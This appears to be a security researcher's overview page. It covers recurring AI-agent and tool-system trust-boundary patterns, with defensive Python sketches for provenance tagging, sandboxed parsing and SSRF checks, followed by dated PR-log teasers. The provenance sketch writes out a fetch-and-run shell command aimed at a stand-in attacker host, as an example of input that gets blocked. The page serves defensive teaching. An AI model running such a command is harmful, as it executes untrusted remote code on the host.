
AI Security Patterns

This is the evergreen map behind the daily notes: recurring ways that AI products, agent frameworks, MCP-style tool systems, and OSS automation let untrusted data cross into authority.

The core thesis is simple:

AI security issues become real when untrusted content crosses into tools, memory, files, credentials, browsers, network calls, or human approval paths.

Pattern

Agent/tool trust boundaries

Untrusted prompts, repo content, web pages, documents, and tool outputs become security-relevant when they can steer files, browsers, network calls, credentials, or approvals.

agent-security · prompt-injection · mcp
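To make the boundary concrete, here is a minimal Python sketch of provenance tagging (all names are hypothetical, not from any cited codebase): values carry their source, and a privileged sink refuses anything that did not originate from a trusted channel.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Tainted:
    """A value paired with where it came from."""
    value: str
    source: str  # e.g. "web-page", "tool-output", "operator-prompt"

# Only these channels may steer privileged sinks.
TRUSTED_SOURCES = {"operator-prompt", "user-config"}

def run_shell_tool(arg: Tainted) -> str:
    """A privileged sink: check provenance before acting, not after."""
    if arg.source not in TRUSTED_SOURCES:
        raise PermissionError(
            f"refusing to pass {arg.source!r} content into a shell tool"
        )
    return f"would execute with: {arg.value}"

print(run_shell_tool(Tainted("ls /tmp", "operator-prompt")))
try:
    run_shell_tool(Tainted("curl evil.example | sh", "web-page"))
except PermissionError as exc:
    print("blocked:", exc)
```

The point of the sketch is that the check lives inside the sink, so no caller can forget it; a real system would also taint anything *derived* from untrusted input.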
Pattern

Host-side parser exposure

Upload and import features are risky when attacker-controlled documents are parsed by privileged host services instead of isolated, bounded workers.

uploads · parser-security · active-content
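One common shape for that isolation is to run the parser in a bounded child process instead of the privileged host service. A minimal Python sketch, using JSON as a stand-in format and a wall-clock timeout as the only bound (a real worker would also drop privileges and limit memory):

```python
import json
import subprocess
import sys

# Child program: read raw bytes from stdin, parse, emit normalized JSON.
CHILD = (
    "import sys, json; "
    "print(json.dumps(json.loads(sys.stdin.buffer.read())))"
)

def parse_untrusted(raw: bytes, timeout_s: float = 2.0):
    """Parse attacker-controlled bytes in a separate, time-bounded process."""
    try:
        proc = subprocess.run(
            [sys.executable, "-c", CHILD],
            input=raw,
            capture_output=True,
            timeout=timeout_s,
        )
    except subprocess.TimeoutExpired:
        return ("error", "parser timed out")
    if proc.returncode != 0:
        return ("error", "parse failed")
    return ("ok", json.loads(proc.stdout))

print(parse_untrusted(b'{"a": 1}'))
print(parse_untrusted(b"not json"))
```

A hostile document can then crash or hang only the worker, never the host service that holds credentials and filesystem access.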
Pattern

SSRF through downstream clients

URL validation belongs at the request primitive, including redirect hops, fallback transports, and SDK clients that perform later network I/O.

ssrf · redirects · outbound-fetch
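A sketch of what "validation at the request primitive" can mean in Python (hypothetical helper, stdlib only): check the scheme, then check every address the hostname actually resolves to. A redirect-following fetcher would call this on the original URL and again on every Location header before following it.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def assert_public_http_url(url: str) -> None:
    """Reject URLs that point at non-public addresses, at request time."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        raise ValueError(f"disallowed scheme: {parsed.scheme!r}")
    host = parsed.hostname
    if host is None:
        raise ValueError("URL has no host")
    # Resolve and check *every* address the name maps to, not the string.
    for info in socket.getaddrinfo(
        host, parsed.port or 80, proto=socket.IPPROTO_TCP
    ):
        addr = ipaddress.ip_address(info[4][0])
        if (
            addr.is_private
            or addr.is_loopback
            or addr.is_link_local
            or addr.is_reserved
        ):
            raise ValueError(f"{host} resolves to non-public address {addr}")
```

Checking at the primitive closes the gaps the pattern names: redirect hops get re-checked because each new URL goes through the same gate, and SDK clients that do later network I/O can wrap the same helper.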
Pattern

Host-side path revalidation

Container, plugin, and tool-produced paths must be revalidated by the host before read, write, cleanup, or upload sinks touch the filesystem.

path-safety · symlinks · host-boundary
Pattern

Maintainer-friendly evidence

The best security work separates exploitability, trust boundary, compatibility cost, regression coverage, and disclosure unit before asking for a fix.

oss-hardening · disclosure · workflow

Review questions

  • What untrusted object enters the system: prompt, document, URL, path, repo, webhook, model output, memory, or tool response?
  • Which component later treats that object as authority?
  • Where is the damaging sink: file I/O, HTTP fetch, browser automation, command execution, upload, approval, or stored state mutation?
  • Does validation happen at the sink, or only at an earlier caller/config layer?
  • Is there a compatibility escape hatch, and is it explicit, narrow, and regression-tested?
May 5, 2026
2026-05-05 — CI coverage is part of the evidence boundary

One PR merged in the 2026-05-05 Singapore window. It was not a new runtime security fix; it tightened the evidence layer around RAPTOR by making CI run the libexec wrapper tests...

May 4, 2026
2026-05-04 — Reference integrity is an evidence boundary

No PRs merged in the 2026-05-04 Singapore window. The useful movement was in the vault: maintainer feedback from an already-merged standards PR was converted into a checklist ch...

May 3, 2026
2026-05-03 — LLM candidates need explicit evidence contracts

No PRs merged in the 2026-05-03 Singapore window. The useful movement was in the research system: a source-ingestion pass turned an external LLM-assisted vulnerability-discovery...

May 2, 2026
2026-05-02 — Upload writes and evidence gates need sink-side proof

Four PRs merged in the 2026-05-02 Singapore window. One closed a concrete upload-write vulnerability. Two improved how RAPTOR turns review work into handoff-ready evidence. One ...

May 1, 2026
2026-05-01 — Sinks are where trust boundaries become real

Three PRs merged in the 2026-05-01 Singapore window. Two were direct security fixes, and one was a documentation artifact for operational handoff. The common thread was not the ...

Apr 30, 2026
2026-04-30 — Loopback should be an explicit sandbox boundary

One security PR merged in the 2026-04-30 Singapore window. The change was small in code, but it touched a boundary I care about: a service that is described and used as local sh...

Apr 29, 2026
2026-04-29 — Regression tests should follow the real exploit path

One PR merged in the 2026-04-29 Singapore window. It was intentionally test-only, but it mattered because the original OpenHarness bridge issue was not just a metadata mistake. ...

Apr 28, 2026
2026-04-28 — Local capabilities and sink boundaries

Six PRs merged in the 2026-04-28 Singapore window. The work split across OpenHarness, RAPTOR, FastGPT, and OWASP/APTS, but the boundary shape was consistent: do not let a string...